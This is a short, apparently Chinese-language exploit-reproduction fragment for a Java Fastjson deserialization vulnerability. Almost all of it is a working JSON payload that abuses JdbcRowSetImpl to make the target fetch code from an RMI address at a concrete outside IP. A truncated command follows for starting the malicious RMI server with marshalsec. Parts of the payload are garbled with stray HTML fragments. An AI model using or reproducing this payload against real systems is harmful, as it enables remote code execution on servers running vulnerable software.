参考链接:
0x01 漏洞复现 RMi
1. payload:
{"@type":"java.lang.Class",br/>"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl""@type":"com.sun.rowset.JdbcRowSetImpl",br/>},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://106.12.201.224:1099/Exploit",
"autoCommit":true
}
}
2. 在×××上执行,启动一个rmi服务
java -cp marshalsec-0.0.3-SNA